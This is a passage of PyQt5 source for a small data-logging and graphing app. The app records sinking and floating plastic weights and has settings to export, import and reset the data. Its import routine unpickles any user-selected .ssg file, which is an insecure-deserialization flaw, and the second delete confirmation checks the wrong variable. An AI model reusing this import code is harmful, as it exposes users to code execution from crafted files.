self.line.setFrameShadow(QtWidgets.QFrame.Plain)\n self.line.setLineWidth(3)\n self.line.setMidLineWidth(3)\n self.line.setFrameShape(QtWidgets.QFrame.HLine)\n self.line.setObjectName(\"line\")\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(90, 20, 121, 31))\n font = QtGui.QFont()\n font.setPointSize(15)\n self.label.setFont(font)\n self.label.setObjectName(\"label\")\n self.helpMenuButton = QtWidgets.QPushButton(self.centralwidget)\n self.helpMenuButton.setGeometry(QtCore.QRect(20, 230, 128, 31))\n self.helpMenuButton.setObjectName(\"helpMenuButton\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 294, 21))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n #Back to float main menu\n self.quitToSelectButton.clicked.connect(self.backButtonPressed)\n\n self.addNewDPandGraphButton.clicked.connect(self.addPointsPressed)\n \n \n self.viewGraphButton.clicked.connect(self.graphSelection)\n \n \n self.editDataPointButton.clicked.connect(self.veiwAndEditDatapoints)\n\n self.settingsButton.clicked.connect(self.floatSettingsPressed)\n\n\n #run graph selection class\n @staticmethod\n def graphSelection(self):\n runClass(\"floatChooseGraphType\")\n\n @staticmethod\n def backButtonPressed(self):\n runClass(\"floatOrSinkMenu\")\n\n @staticmethod\n def addPointsPressed(self):\n runClass(\"smmAddDP\")\n\n @staticmethod\n def veiwAndEditDatapoints(self):\n runClass(\"editFloatDataPoint\")\n\n #run settings\n @staticmethod\n def floatSettingsPressed(self):\n runClass(\"floatSettings\")\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"Sinking Data - Main Menu\"))\n self.viewGraphButton.setText(_translate(\"MainWindow\", \"view Graphs\"))\n self.settingsButton.setText(_translate(\"MainWindow\", \"Settings\"))\n self.quitToSelectButton.setText(_translate(\"MainWindow\", \"Quit to Select\"))\n self.editDataPointButton.setText(_translate(\"MainWindow\", \"view And Edit Data Points\"))\n self.addNewDPandGraphButton.setText(_translate(\"MainWindow\", \"Add New Data Point\"))\n self.label.setText(_translate(\"MainWindow\", \"Floating Data\"))\n self.helpMenuButton.setText(_translate(\"MainWindow\", \"Help Menu\"))\n\n\nclass smmAddDP(object):\n def setupUi(self, MainWindow):\n self.currentDateCBChecked = True\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(341, 377)\n font = QtGui.QFont()\n font.setPointSize(12)\n MainWindow.setFont(font)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.sinkingWeightTextBox = QtWidgets.QTextEdit(self.centralwidget)\n self.sinkingWeightTextBox.setEnabled(True)\n self.sinkingWeightTextBox.setGeometry(QtCore.QRect(220, 70, 111, 21))\n self.sinkingWeightTextBox.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n self.sinkingWeightTextBox.setObjectName(\"sinkingWeightTextBox\")\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(30, 60, 171, 41))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.label.setFont(font)\n self.label.setObjectName(\"label\")\n self.label_2 = QtWidgets.QLabel(self.centralwidget)\n self.label_2.setGeometry(QtCore.QRect(30, 90, 151, 41))\n self.label_2.setObjectName(\"label_2\")\n self.floatingWeightTextBox = QtWidgets.QTextEdit(self.centralwidget)\n self.floatingWeightTextBox.setEnabled(True)\n self.floatingWeightTextBox.setGeometry(QtCore.QRect(220, 100, 111, 21))\n self.floatingWeightTextBox.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n self.floatingWeightTextBox.setObjectName(\"floatingWeightTextBox\")\n self.useCurrentDatecheckBox = QtWidgets.QCheckBox(self.centralwidget)\n self.useCurrentDatecheckBox.setGeometry(QtCore.QRect(30, 160, 171, 20))\n self.useCurrentDatecheckBox.setObjectName(\"useCurrentDatecheckBox\")\n self.useCurrentDatecheckBox.toggle()\n self.label_3 = QtWidgets.QLabel(self.centralwidget)\n self.label_3.setGeometry(QtCore.QRect(30, 120, 181, 41))\n self.label_3.setObjectName(\"label_3\")\n self.dateTextBox = QtWidgets.QTextEdit(self.centralwidget)\n self.dateTextBox.setEnabled(True)\n self.dateTextBox.setGeometry(QtCore.QRect(220, 130, 111, 21))\n self.dateTextBox.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n self.dateTextBox.setObjectName(\"dateTextBox\")\n #get date and disable date box\n self.dateTextBox.setDisabled(True)\n self.currentDateLabel = QtWidgets.QLabel(self.centralwidget)\n self.currentDateLabel.setGeometry(QtCore.QRect(190, 160, 121, 20))\n self.currentDateLabel.setObjectName(\"currentDateLabel\")\n self.currentDateLabel.setText(_translate(\"MainWindow\", self.currentDateFormatted()))\n \n \n\n self.pushButton = QtWidgets.QPushButton(self.centralwidget)\n self.pushButton.setGeometry(QtCore.QRect(30, 200, 271, 31))\n self.pushButton.setObjectName(\"pushButton\")#veiw graphs\n self.pushButton_2 = QtWidgets.QPushButton(self.centralwidget)\n self.pushButton_2.setGeometry(QtCore.QRect(30, 240, 271, 31))\n self.pushButton_2.setObjectName(\"pushButton_2\")\n self.line = QtWidgets.QFrame(self.centralwidget)\n self.line.setGeometry(QtCore.QRect(30, 50, 271, 20))\n self.line.setFrameShadow(QtWidgets.QFrame.Plain)\n self.line.setLineWidth(2)\n self.line.setFrameShape(QtWidgets.QFrame.HLine)\n self.line.setObjectName(\"line\")\n self.label_4 = QtWidgets.QLabel(self.centralwidget)\n self.label_4.setGeometry(QtCore.QRect(30, 30, 271, 20))\n self.label_4.setAlignment(QtCore.Qt.AlignCenter)\n self.label_4.setObjectName(\"label_4\")\n self.quitToMenuButton = QtWidgets.QPushButton(self.centralwidget)\n self.quitToMenuButton.setGeometry(QtCore.QRect(30, 280, 271, 31))\n self.quitToMenuButton.setObjectName(\"quitToMenuButton\")\n self.statusLabel = QtWidgets.QLabel(self.centralwidget)\n self.statusLabel.setGeometry(QtCore.QRect(110, 10, 111, 20))\n font = QtGui.QFont()\n font.setPointSize(10)\n self.statusLabel.setFont(font)\n self.statusLabel.setText(\"\")\n self.statusLabel.setAlignment(QtCore.Qt.AlignCenter)\n self.statusLabel.setObjectName(\"statusLabel\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 331, 21))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n \n self.useCurrentDatecheckBox.stateChanged.connect(lambda:self.dateCBEval(self.useCurrentDatecheckBox))#lambda fycbiton call checkbox eval\n\n self.pushButton.clicked.connect(self.addPoint)\n\n self.quitToMenuButton.clicked.connect(self.backButtonPressed)\n self.pushButton_2.clicked.connect(self.graphSelection)\n\n #run graph selection class\n @staticmethod\n def graphSelection(self):\n runClass(\"floatChooseGraphType\")\n #go back to flaot main menu\n @staticmethod\n def backButtonPressed(self):\n runClass(\"floatMainMenu\")\n \n #create error message based on input\n def createErrorMessage(self,title,message):\n errorMsg = QMessageBox()\n errorMsg.setIcon(QMessageBox.Critical)\n errorMsg.setText(title)\n errorMsg.setInformativeText(message)\n errorMsg.setWindowTitle(title)\n errorMsg.exec()\n\n def dateCBEval(self,checkbox):#toggle text box\n if checkbox.isChecked() == True:\n self.dateTextBox.setDisabled(True)\n else:\n self.dateTextBox.setDisabled(False)\n \n\n def addPoint(self):\n sinkWeightFloat = \"\"\n floatWeightFloat = \"\"\n \n if self.useCurrentDatecheckBox.isChecked():\n dateString = str(self.currentDateFormatted())\n else:\n dateString = self.dateTextBox.toPlainText()\n sinkWeightString = self.sinkingWeightTextBox.toPlainText()\n floatWeightString = self.floatingWeightTextBox.toPlainText()\n\n sinkErrorIn = False\n floatErrorIn = False\n try:\n sinkWeightFloat = float(sinkWeightString)\n except ValueError:\n self.createErrorMessage(\"Error!\",\"Input for Sink Weight is Invalid!\")\n sinkErrorIn = True\n try:\n floatWeightFloat = float(floatWeightString)\n except ValueError:\n self.createErrorMessage(\"Error!\",\"Input for Float Weight is Invalid!\")\n floatErrorIn = True\n\n if floatErrorIn != False or sinkErrorIn != False:\n print(floatErrorIn)\n print(sinkErrorIn)\n return None\n\n print(dateString)\n print(sinkWeightFloat)\n print(floatWeightFloat)\n \n \n data = self.makeJsonData(dateString,sinkWeightFloat,floatWeightFloat)\n self.saveToJson(data)\n \n #format data to json dict\n def makeJsonData(self,date,sinkWeight,floatWeight):\n \n data = {\"date\":date,\"sink\":sinkWeight,\"float\":floatWeight}\n \n print(data)\n return data\n #save data\n def saveToJson(self,data):\n with open('floatData.txt', 'a') as file:\n json.dump(data, file)\n file.write(\"\\n\")\n\n \n\n \n\n\n\n\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.label.setText(_translate(\"MainWindow\", \"Sinking weight (g) :\"))\n self.label_2.setText(_translate(\"MainWindow\", \"Floating weight (g) :\"))\n self.useCurrentDatecheckBox.setText(_translate(\"MainWindow\", \"use Current Date : \"))\n self.label_3.setText(_translate(\"MainWindow\", \"Date ( MM/DD/YYYY) :\"))\n \n self.pushButton.setText(_translate(\"MainWindow\", \"Add data point\"))\n self.pushButton_2.setText(_translate(\"MainWindow\", \"Veiw Graphs\"))\n self.label_4.setText(_translate(\"MainWindow\", \"Add Float Data point\"))\n self.quitToMenuButton.setText(_translate(\"MainWindow\", \"Return to menu\"))\n \n def currentDateFormatted(self):\n currentDate = datetime.date.today()\n day = currentDate.day\n month = currentDate.month\n year = currentDate.year\n\n formattedDate = \"%s/%s/%s\" % (month,day,year)\n\n return formattedDate\n\n#edit fmm data points\nclass editFloatDataPoint(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(332, 476)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.listWidget = QtWidgets.QListWidget(self.centralwidget)\n self.listWidget.setGeometry(QtCore.QRect(15, 51, 301, 291))\n self.listWidget.setObjectName(\"listWidget\")\n self.listWidget.setSpacing(5)\n \n self.removeEntryButton = QtWidgets.QPushButton(self.centralwidget)\n self.removeEntryButton.setGeometry(QtCore.QRect(15, 360, 301, 31))\n self.removeEntryButton.setObjectName(\"removeEntryButton\")\n self.returnToMenuButton = QtWidgets.QPushButton(self.centralwidget)\n self.returnToMenuButton.setGeometry(QtCore.QRect(15, 400, 301, 31))\n self.returnToMenuButton.setObjectName(\"returnToMenuButton\")\n self.line = QtWidgets.QFrame(self.centralwidget)\n self.line.setGeometry(QtCore.QRect(15, 40, 301, 3))\n self.line.setFrameShadow(QtWidgets.QFrame.Plain)\n self.line.setLineWidth(3)\n self.line.setFrameShape(QtWidgets.QFrame.HLine)\n self.line.setObjectName(\"line\")\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(15, 10, 301, 20))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.label.setFont(font)\n self.label.setAlignment(QtCore.Qt.AlignCenter)\n self.label.setObjectName(\"label\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 332, 21))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n \n self.retranslateUi(MainWindow)\n self.entries = self.fillList(\"floatData.txt\")\n \n \n\n print(self.entries)\n\n self.fillTable(self.entries)\n\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n #get current item\n self.currentItem = \"\"\n self.listWidget.itemSelectionChanged.connect(self.returnSelectedItem)\n\n \n\n\n\n\n #return to menu\n self.returnToMenuButton.clicked.connect(self.returnToMenuPressed)\n \n #remove entry pressed\n \n #lamba im using kinda like static\n #maybe better than static for non class things?\n self.removeEntryButton.clicked.connect(lambda: self.removeEntryPressed(self.currentItem))\n \n\n\n #return active item\n def returnSelectedItem(self):\n selectedItem = self.listWidget.currentItem().text()\n print(selectedItem)\n self.currentItem = selectedItem\n print(\"current item\")\n print(self.currentItem)\n\n\n def removeEntryPressed(self,currentItem):\n entryStr = currentItem\n self.confirmDeleteMessage(entryStr)\n\n\n def removeItemFromList(self,item,file):\n #HOW WORKS\n #FIND DATA IN FILE AND THEN WRITE BACK TO FILE EXCLUDING ORIGNINAL DATA POINT\n dataLines = []\n \n itemData = item.strip(\"\\n\")\n itemData = itemData.replace(\"Entry Date: \",\"\")\n itemData = itemData.replace(\"Sinking Plastic Weight: \",\":\")\n itemData = itemData.replace(\"Floating Plastic Weight: \",\":\")\n itemData = itemData.replace(\"\\n\",\"\")\n \n itemDataList = itemData.split(\":\")\n\n date = itemDataList[0]\n sinking = itemDataList[1]\n floating = itemDataList[2]\n \n \n print(\"====================================\")\n print(\"itemData: \",itemDataList)\n print(\"====================================\")\n\n \n\n with open(str(file),\"r\") as entryFile:\n for entry in entryFile.readlines():\n dataLines.append(entry)\n entryFile.close\n\n for line in dataLines:\n lineJson = json.loads(line)\n \n \n\n if str(lineJson[\"date\"]) == str(date) and str(lineJson[\"sink\"]) == str(sinking) and str(lineJson[\"float\"]) == str(floating):\n print(\"MATCH FOUND\")\n print(lineJson)\n print(itemDataList)\n lineToExclude = line#exclude this line during writeback thus deleting it\n\n print(\"Lines: \",dataLines)\n\n with open(str(file),\"r\") as entryFile:\n lines = entryFile.readlines()\n with open(str(file),\"w\") as entryFile:\n for line in lines:\n \n if line != lineToExclude:\n entryFile.write(line)\n else:\n print(\"LINE REMOVED\")\n self.createAlertPopup(\"Removed!\",\"Entry was removed succesfully!\",\"Entry Removed!\")\n \n runClass(\"editFloatDataPoint\") #it updates\n\n def createAlertPopup(self,title,message,winTitle):\n alertMsg = QMessageBox()\n alertMsg.setIcon(QMessageBox.Information)\n alertMsg.setText(title)\n alertMsg.setInformativeText(message)\n alertMsg.setWindowTitle(winTitle)\n alertMsg.exec()\n\n @staticmethod\n def returnToMenuPressed(self):\n runClass(\"floatMainMenu\")\n\n def confirmDeleteMessage(self,item):\n item = item.replace(\"----------------------------------------------------\",\"\")\n\n confirmDeleteMessagebox= QMessageBox()\n confirmDeleteMessagebox.setIcon(QMessageBox.Warning)\n confirmDeleteMessagebox.setText(\"Are you sure you would like to delete the following entry? This action cannot be undone.\")\n \n \n confirmDeleteMessagebox.setInformativeText(item)\n confirmDeleteMessagebox.setWindowTitle(\"Confirm Deletion?\")\n confirmDeleteMessagebox.addButton(QMessageBox.Yes)\n confirmDeleteMessagebox.addButton(QMessageBox.No)\n confirmDeleteMessagebox.exec()\n buttonResult = confirmDeleteMessagebox.clickedButton().text() #could cause probs\n buttonResult= buttonResult.replace(\"&\",\"\").lower()\n \n print(buttonResult)\n\n if buttonResult == \"yes\":#yes button is pressed\n print(\"yes\")\n self.removeItemFromList(item,\"floatData.txt\")\n \n if buttonResult == \"no\":#no button is pressed\n print(\"nomegalul\")\n pass\n \n \n\n \n\n def fillList(self,list):\n entries = []\n with open(str(list),\"r\") as entryFile:\n for entry in entryFile.readlines():\n entries.append(entry)\n print(entry,\"\\n\")\n \n #print(entries)\n entryFile.close()\n return entries\n\n\n\n def formatEntry(self,item):\n \n item = json.loads(item)\n date = item[\"date\"]\n sinkingWeight = item[\"sink\"]\n floatingWeight = item[\"float\"]\n\n #==================================\n #----------------------------------------------------\n formattedString = \"----------------------------------------------------\\nEntry Date: \" + str(date) + \"\\nSinking Plastic Weight: \" + str(sinkingWeight) + \"\\nFloating Plastic Weight: \" + str(floatingWeight) +\"\\n----------------------------------------------------\" \n\n print(formattedString)\n\n\n return(formattedString)\n\n\n def fillTable(self,entryList):\n for item in entryList:\n item = self.formatEntry(item)\n \n self.listWidget.addItem(item)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.removeEntryButton.setText(_translate(\"MainWindow\", \"Remove Selected Entry\"))\n self.returnToMenuButton.setText(_translate(\"MainWindow\", \"Return To Menu\"))\n self.label.setText(_translate(\"MainWindow\", \"Edit Floating Data\"))\n\n\n\n\n\nclass floatSettings(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(453, 538)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.line = QtWidgets.QFrame(self.centralwidget)\n self.line.setGeometry(QtCore.QRect(20, 50, 411, 20))\n self.line.setFrameShadow(QtWidgets.QFrame.Plain)\n self.line.setLineWidth(3)\n self.line.setFrameShape(QtWidgets.QFrame.HLine)\n self.line.setObjectName(\"line\")\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(20, 20, 411, 41))\n font = QtGui.QFont()\n font.setPointSize(20)\n self.label.setFont(font)\n self.label.setAlignment(QtCore.Qt.AlignCenter)\n self.label.setObjectName(\"label\")\n self.label_2 = QtWidgets.QLabel(self.centralwidget)\n self.label_2.setGeometry(QtCore.QRect(20, 70, 401, 41))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.label_2.setFont(font)\n self.label_2.setObjectName(\"label_2\")\n self.uclTargetInput = QtWidgets.QTextEdit(self.centralwidget)\n self.uclTargetInput.setGeometry(QtCore.QRect(220, 80, 41, 21))\n self.uclTargetInput.setAcceptDrops(True)\n self.uclTargetInput.setAutoFillBackground(False)\n self.uclTargetInput.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.uclTargetInput.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n self.uclTargetInput.setObjectName(\"uclTargetInput\")\n self.setUclTargetButton = QtWidgets.QPushButton(self.centralwidget)\n self.setUclTargetButton.setGeometry(QtCore.QRect(270, 80, 41, 21))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.setUclTargetButton.setFont(font)\n self.setUclTargetButton.setObjectName(\"setUclTargetButton\")\n self.label_3 = QtWidgets.QLabel(self.centralwidget)\n self.label_3.setGeometry(QtCore.QRect(20, 120, 151, 41))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.label_3.setFont(font)\n self.label_3.setObjectName(\"label_3\")\n self.label_4 = QtWidgets.QLabel(self.centralwidget)\n self.label_4.setGeometry(QtCore.QRect(20, 90, 411, 41))\n font = QtGui.QFont()\n font.setPointSize(8)\n self.label_4.setFont(font)\n self.label_4.setObjectName(\"label_4\")\n self.uclTargetLabel = QtWidgets.QLabel(self.centralwidget)\n self.uclTargetLabel.setGeometry(QtCore.QRect(170, 120, 41, 41))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.uclTargetLabel.setFont(font)\n self.uclTargetLabel.setObjectName(\"uclTargetLabel\")\n self.exportDataButton = QtWidgets.QPushButton(self.centralwidget)\n self.exportDataButton.setGeometry(QtCore.QRect(20, 180, 411, 31))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.exportDataButton.setFont(font)\n self.exportDataButton.setObjectName(\"exportDataButton\")\n self.label_5 = QtWidgets.QLabel(self.centralwidget)\n self.label_5.setGeometry(QtCore.QRect(20, 210, 411, 41))\n font = QtGui.QFont()\n font.setPointSize(8)\n self.label_5.setFont(font)\n self.label_5.setWordWrap(True)\n self.label_5.setObjectName(\"label_5\")\n self.label_6 = QtWidgets.QLabel(self.centralwidget)\n self.label_6.setGeometry(QtCore.QRect(20, 270, 411, 41))\n font = QtGui.QFont()\n font.setPointSize(8)\n self.label_6.setFont(font)\n self.label_6.setWordWrap(True)\n self.label_6.setObjectName(\"label_6\")\n self.importDataButton = QtWidgets.QPushButton(self.centralwidget)\n self.importDataButton.setGeometry(QtCore.QRect(20, 250, 411, 31))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.importDataButton.setFont(font)\n self.importDataButton.setObjectName(\"importDataButton\")\n self.label_7 = QtWidgets.QLabel(self.centralwidget)\n self.label_7.setGeometry(QtCore.QRect(20, 420, 411, 41))\n font = QtGui.QFont()\n font.setPointSize(8)\n self.label_7.setFont(font)\n self.label_7.setWordWrap(True)\n self.label_7.setObjectName(\"label_7\")\n self.resetDataButton = QtWidgets.QPushButton(self.centralwidget)\n self.resetDataButton.setGeometry(QtCore.QRect(20, 390, 411, 31))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.resetDataButton.setFont(font)\n self.resetDataButton.setObjectName(\"resetDataButton\")\n self.returnToMenuButton = QtWidgets.QPushButton(self.centralwidget)\n self.returnToMenuButton.setGeometry(QtCore.QRect(20, 460, 411, 31))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.returnToMenuButton.setFont(font)\n self.returnToMenuButton.setObjectName(\"returnToMenuButton\")\n self.line_2 = QtWidgets.QFrame(self.centralwidget)\n self.line_2.setGeometry(QtCore.QRect(20, 150, 201, 16))\n self.line_2.setFrameShadow(QtWidgets.QFrame.Plain)\n self.line_2.setLineWidth(3)\n self.line_2.setFrameShape(QtWidgets.QFrame.HLine)\n self.line_2.setObjectName(\"line_2\")\n self.createBackupButton = QtWidgets.QPushButton(self.centralwidget)\n self.createBackupButton.setGeometry(QtCore.QRect(20, 320, 411, 31))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.createBackupButton.setFont(font)\n self.createBackupButton.setObjectName(\"createBackupButton\")\n self.label_8 = QtWidgets.QLabel(self.centralwidget)\n self.label_8.setGeometry(QtCore.QRect(20, 340, 411, 41))\n font = QtGui.QFont()\n font.setPointSize(8)\n self.label_8.setFont(font)\n self.label_8.setWordWrap(True)\n self.label_8.setObjectName(\"label_8\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 453, 21))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n self.updateUclLabel()\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n\n self.returnToMenuButton.clicked.connect(self.returnToMenuPressed)\n\n self.setUclTargetButton.clicked.connect(lambda: self.settingsSetUcl())\n\n self.exportDataButton.clicked.connect(lambda: self.exportFloatData(\"floatDataExported.ssg\"))\n\n self.importDataButton.clicked.connect(lambda: self.importFloatData())\n\n self.resetDataButton.clicked.connect(lambda: self.clearAllData())\n \n \n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.label.setText(_translate(\"MainWindow\", \"Float Settings\"))\n self.label_2.setText(_translate(\"MainWindow\", \"Upper Control Limit Target: \"))\n self.setUclTargetButton.setText(_translate(\"MainWindow\", \"Set\"))\n self.label_3.setText(_translate(\"MainWindow\", \"Current UCL Target:\"))\n self.label_4.setText(_translate(\"MainWindow\", \"Sets the upper control limit target. Default = 100\"))\n self.uclTargetLabel.setText(_translate(\"MainWindow\", \"100\"))\n self.exportDataButton.setText(_translate(\"MainWindow\", \"Export Data\"))\n self.label_5.setText(_translate(\"MainWindow\", \"Export floating data in .SSG format so that it can be reimported to the program elsewhere \"))\n self.label_6.setText(_translate(\"MainWindow\", \"Import floating data in .SSG format so that it can be used.\"))\n self.importDataButton.setText(_translate(\"MainWindow\", \"Import Data\"))\n self.label_7.setText(_translate(\"MainWindow\", \"Resets all floating data\"))\n self.resetDataButton.setText(_translate(\"MainWindow\", \"Reset all Floating Data\"))\n self.returnToMenuButton.setText(_translate(\"MainWindow\", \"Return To Menu\"))\n self.createBackupButton.setText(_translate(\"MainWindow\", \"Create a Data Backup\"))\n self.label_8.setText(_translate(\"MainWindow\", \"Import floating data in .SSG format so that it can be used.\"))\n\n self.updateUclLabel()\n \n \n\n\n @staticmethod\n def returnToMenuPressed(self):\n runClass(\"floatMainMenu\")\n \n def settingsSetUcl(self):\n \n \n uclString = self.uclTargetInput.toPlainText()\n \n \n try:\n uclInt = round(int(uclString),0)\n except ValueError:\n self.createErrorMessage(\"Value Error\",\"Error! Value must be a whole number (ex. '100') not a decimal or non numeric value.)\")\n return\n\n print(\"ucl int: \",uclInt)\n\n \n \n with open(\"floatSettings.txt\",\"w\") as settingsFile:\n \n \n settingsFile.write(str(uclInt))\n settingsFile.close()\n self.updateUclLabel()\n\n def updateUclLabel(self):\n\n try:\n with open(\"floatSettings.txt\",\"r\") as settingsFile:\n \n \n lines = settingsFile.readlines()\n print(lines)\n settingsFile.close()\n except FileNotFoundError:\n with open(\"floatSettings.txt\",\"w\") as settingsFile:\n \n \n settingsFile.write(\"100\")\n settingsFile.close()\n with open(\"floatSettings.txt\",\"r\") as settingsFile:\n \n \n lines = settingsFile.readlines()\n print(lines)\n settingsFile.close()\n \n ucl = lines[0]\n self.uclTargetLabel.setText(str(ucl))\n \n\n #create error message based on input\n def createErrorMessage(self,title,message):\n errorMsg = QMessageBox()\n errorMsg.setIcon(QMessageBox.Critical)\n errorMsg.setText(title)\n errorMsg.setInformativeText(message)\n errorMsg.setWindowTitle(title)\n errorMsg.exec()\n \n def createInfoMessage(self,title,message):\n infoMsg = QMessageBox()\n infoMsg.setIcon(QMessageBox.Information)\n infoMsg.setText(title)\n infoMsg.setInformativeText(message)\n infoMsg.setWindowTitle(title)\n infoMsg.exec()\n\n def exportFloatData(self,fileExportName):\n lines =[]\n cwd = os.getcwd()\n print(\"cwd: \",cwd)\n with open(\"floatData.txt\",\"r\") as floatData:\n lines = floatData.readlines() \n floatData.close()\n\n #\"floatDataExported.ssg\"\n\n with open(fileExportName,\"wb\") as outfile:\n pickle.dump(lines,outfile)\n outfile.close()\n self.createInfoMessage(\"Data Exported Succesfully!\",\"File: '\"+ str(fileExportName) +\"' has been exported to directory: \" +str(cwd) +\"\")\n\n def importFloatData(self):\n root = Tk()\n \n root.withdraw() #don't want a full GUi keep the root window from appearing\n ftypes = [\n ('Six Sigma Grapher files', '*.ssg'), \n ('All files', '*'), \n ]\n \n filePath = askopenfilename(filetypes=ftypes) # show \"Open\" dialog box and return path\n \n if \".ssg\" in filePath:\n print(\"acceptable file\")\n\n \n \n\n confirmImportMessagebox= QMessageBox()\n confirmImportMessagebox.setIcon(QMessageBox.Warning)\n confirmImportMessagebox.setText(\"Are you sure you would like to import this data? This action cannot be undone and all current data will be overwritten.\")\n \n\n \n confirmImportMessagebox.setWindowTitle(\"Import and Overwrite?\")\n confirmImportMessagebox.addButton(QMessageBox.Yes)\n confirmImportMessagebox.addButton(QMessageBox.No)\n confirmImportMessagebox.exec()\n buttonResult = confirmImportMessagebox.clickedButton().text() #could cause probs\n buttonResult= buttonResult.replace(\"&\",\"\").lower()\n\n \n\n if buttonResult == \"yes\":#yes button is pressed\n print(\"yes\")\n importedFile = open(filePath,\"rb\")\n importedFileData = pickle.load(importedFile)\n importedFile.close()\n print(importedFileData)\n print(type(importedFileData))\n \n with open(\"floatData.txt\",\"w\") as floatData:\n for line in importedFileData:\n floatData.write(line)\n floatData.close()\n self.createInfoMessage(\"File imported succesfully!\",\"File: 'floatData.txt' has been imported succesfully!\")\n\n \n \n if buttonResult == \"no\":#no button is pressed\n print(\"nomegalul\")\n pass\n\n\n else:\n self.createErrorMessage(\"Invalid Filetype!\",\"This is an invalid filetype! Only '.ssg' files are accepeted!\")\n return\n \n\n def clearAllData(self):\n confirmDeleteMessagebox= QMessageBox()\n confirmDeleteMessagebox.setIcon(QMessageBox.Warning)\n confirmDeleteMessagebox.setText(\"Are you sure you would like to delete all data? This action is irreversible and all current data will be lost!\")\n \n\n \n confirmDeleteMessagebox.setWindowTitle(\"Delete data?\")\n confirmDeleteMessagebox.addButton(QMessageBox.Yes)\n confirmDeleteMessagebox.addButton(QMessageBox.No)\n confirmDeleteMessagebox.exec()\n buttonResult = confirmDeleteMessagebox.clickedButton().text() #could cause probs\n buttonResult= buttonResult.replace(\"&\",\"\").lower()\n\n if buttonResult == \"yes\":#yes button is pressed\n \n time.sleep(1)\n \n proceedMessagebox= QMessageBox()\n proceedMessagebox.setIcon(QMessageBox.Warning)\n proceedMessagebox.setText(\"Are you sure you would like proceed?\")\n \n\n \n proceedMessagebox.setWindowTitle(\"Proceed?\")\n proceedMessagebox.addButton(QMessageBox.Yes)\n proceedMessagebox.addButton(QMessageBox.No)\n proceedMessagebox.exec()\n proceedButtonResult =proceedMessagebox.clickedButton().text() #could cause probs\n proceedButtonResult= buttonResult.replace(\"&\",\"\").lower()\n\n if proceedButtonResult == \"yes\":#yes button is pressed\n print(\"proceeding to delete.\")\n time.sleep(.3)\n print(\"proceeding to delete..\")\n time.sleep(.3)\n print(\"proceeding to delete...\")\n 